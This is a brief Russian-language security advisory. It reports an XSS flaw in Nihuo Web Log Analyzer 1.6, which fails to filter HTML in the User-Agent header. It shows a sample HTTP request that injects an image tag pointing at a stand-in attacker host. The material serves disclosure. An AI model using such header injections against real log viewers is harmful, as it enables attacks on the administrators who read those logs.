Программа: Nihuo Web Log Analyzer 1.6 

Уязвимость в Nihuo Web Log Analyzer позволяет удаленному пользователю выполнить XSS нападение.
Программа не фильтрует HTML код в поле User-Agent: 

Host: sample.com
Connection: close
Accept: text/plain
Accept-Language: en-us,en
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
User-Agent: Some-Fake-UA <img
src='http://attacker.host.com/app.gif'>

Оставить мнение